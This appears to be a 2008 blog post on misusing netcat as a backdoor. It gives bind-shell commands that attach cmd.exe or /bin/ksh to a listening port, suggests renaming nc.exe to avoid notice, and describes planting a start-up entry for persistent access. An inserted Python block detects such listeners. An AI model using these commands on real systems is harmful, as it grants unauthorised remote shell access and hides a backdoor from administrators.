Wednesday, 27 August 2008

Naughtier Netcat

Netcat can also be used as a backdoor into a system and a remote shell.
Netcat as a Trojan

It seems all too easy...

  • @echo off
    winsys.exe -L -d -p 139 -t -e cmd.exe

Note that "winsys.exe" in the above command is really just "nc.exe" on our Windows host, which we have simply renamed. In the process list we then have something that is less likely to be discovered.

Once you have run the script on the host that you wish to Trojanise, connect to it with netcat (telnet also works) as follows:

  • # nc -v [ip address of target] [port]

On UNIX we can do something similar. The following starts netcat in listen mode.

  • # nc -l -p [port] -e /bin/ksh

Of course, you can listen on either TCP or UDP. In fact, adding this line to a start-up script could allow an attacker to selectively route connections either to a valid service or to the "Trojan" (see TCP Wrappers).

For instance, if an attacker gets shell access through a vulnerability in BIND (DNS), the attacker could install a netcat start-up entry to allow future access whilst patching the issue to stop further attacks (and keep the server for themselves).
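The defender's counterpart to the renamed-listener trick above, added here as an example and not code from the original post: it scans process command lines for the netcat listen-plus-execute flag combination and deliberately ignores the binary name, because that is exactly what renaming nc.exe defeats. The process list is a constructed sample embedded in the code; on a real host it would come from `ps -eo args` or a Windows process listing.

```python
from typing import Dict, List, Optional

# Constructed sample of process command lines, standing in for the output of
# `ps -eo args` on UNIX or a Windows process listing. One entry is the renamed
# netcat from the post, one is the UNIX listener, the rest are benign noise.
SAMPLE_PROCESSES = [
    r"C:\Windows\System32\svchost.exe -k netsvcs",
    "winsys.exe -L -d -p 139 -t -e cmd.exe",
    "/usr/sbin/sshd -D",
    "nc -l -p 4444 -e /bin/ksh",
    "nc -v 192.0.2.10 80",
]

LISTEN = {"l", "L"}      # netcat listen flags (-L is the Windows "listen harder")
EXECUTE = {"e", "c"}     # flags that hand the accepted connection to a program
PORT = "p"


def analyse(cmdline: str) -> Optional[Dict[str, Optional[str]]]:
    """Return listener details if the command line combines a netcat-style
    listen flag with an execute flag, otherwise None. The binary name is
    not consulted: a renamed nc.exe still needs the same flags to work."""
    tokens = cmdline.split()
    if not tokens:
        return None
    letters = set()
    port = program = None
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if tok.startswith("-") and len(tok) > 1 and not tok.startswith("--"):
            letters.update(tok[1:])
            # The last letter of a flag cluster may take the next token as
            # its argument, e.g. "-p 139", "-lp 4444" or "-e cmd.exe".
            last = tok[-1]
            if last == PORT and i + 1 < len(tokens):
                port, i = tokens[i + 1], i + 1
            elif last in EXECUTE and i + 1 < len(tokens):
                program, i = tokens[i + 1], i + 1
        i += 1
    if letters & LISTEN and letters & EXECUTE:
        return {"binary": tokens[0], "port": port, "program": program}
    return None


def find_listener_candidates(processes: List[str]) -> List[Dict[str, Optional[str]]]:
    """Flag every command line that looks like a bind-shell listener.
    Heuristic only: other tools also use -l and -e, so confirm each hit
    against open listening sockets and the hash of the binary."""
    return [hit for hit in map(analyse, processes) if hit is not None]
```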

Even simple tools can be used in both positive and negative ways.
